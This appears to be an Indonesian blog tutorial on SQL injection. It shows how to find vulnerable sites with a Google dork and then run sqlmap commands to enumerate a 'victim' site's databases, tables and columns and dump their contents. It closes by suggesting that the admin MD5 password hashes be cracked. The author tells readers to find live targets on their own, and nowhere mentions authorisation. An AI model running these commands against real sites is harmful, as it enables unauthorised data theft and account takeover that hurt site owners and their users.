Sebelumnya, untuk melakukan tehnik ini kita memerlukan beberapa peralatan:
- PC/Laptop yang sudah terkoneksi Internet ( WAJIB)
- OS Backtrack tentunya ( VBox, DualBoot, SingleBoot )
- Kopi, Snack, Rokok sebagai Pelengkap
inurl: productinfo.php?id=
Please use google + your brain to find more ..
Tentunya kawan2 sudah bisa membedakan mana yang vunl dan mana yang tidak. Ane asumsikan kita sudah mendapatkan targetnya. lanjut next step.
Buka terminal & copykan command ini di terminal :
cd /pentest/database/sqlmap
Ntar bakal muncul kek gini :
Habis tu masukin comand dibawah ini untuk mencari databasenya:
python sqlmap.py -u www.victim.com --dbs
Setelah Menemukan Databasenya, kita lanjut mencari Table nya, ketik comand dibawah ini :
python sqlmap.py -u www.victim.com -D DB_Name --tables
Kemudian kita lanjut mencari columns dari Table yang sudah kita temukan :
python sqlmap.py -u www.victim.com -D DB_Name -T Nama_Table --columns
Langkah berikutnya, Kita tinggal dump columns yang kita inginkan untuk mendapatkan data di dalamnya :
python sqlmap.py -u www.victim.com -D DB_Name -T Table_Name --dump
Sekarang kita bisa memperoleh data dari columns yg kita tentukan.. selanjutnya ... terserah kawan - kawan deh ... :D
Mohon maaf pada tutorial ini ane kagak nyertain target live, biar bisa sama - sama belajar dalam menemukan target yang vunl.
Mohon maaf pada tutorial ini ane kagak nyertain target live, biar bisa sama - sama belajar dalam menemukan target yang vunl.
Kalau seandainya ngedump Columns Admin, biasanya passwordnya berbentuk MD5, Silahkan di has terlebih dahulu ....
Sekian dulu tutorial kali ini, semoga memberi manfaat buat kita semua...
Salam
Tidak ada komentar